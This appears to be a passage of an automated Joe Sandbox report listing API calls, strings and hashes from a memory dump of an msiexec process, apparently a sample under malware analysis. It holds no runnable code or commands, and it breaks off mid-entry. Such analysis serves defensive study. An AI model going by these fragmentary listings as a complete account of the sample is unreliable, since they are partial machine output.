                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              APIs
                                                              • strlen.MSVCRT ref: 00408DFA
                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                              • memset.MSVCRT ref: 00408E46
                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memsetstrlen
                                                              • String ID:
                                                              • API String ID: 2350177629-0
                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-1606337402
                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                              APIs
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                              • memset.MSVCRT ref: 00408FD4
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                              • memset.MSVCRT ref: 00409042
                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 265355444-0
                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • free.MSVCRT ref: 00417544
                                                              • free.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • free.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040FDD5
                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 1775345501-2769808009
                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 313946961-1552265934
                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              • API String ID: 0-1953309616
                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1265369119-0
                                                              • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              APIs
                                                              • memset.MSVCRT ref: 0044A6EB
                                                              • memset.MSVCRT ref: 0044A6FB
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                              • free.MSVCRT ref: 0040E9D3
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • free.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
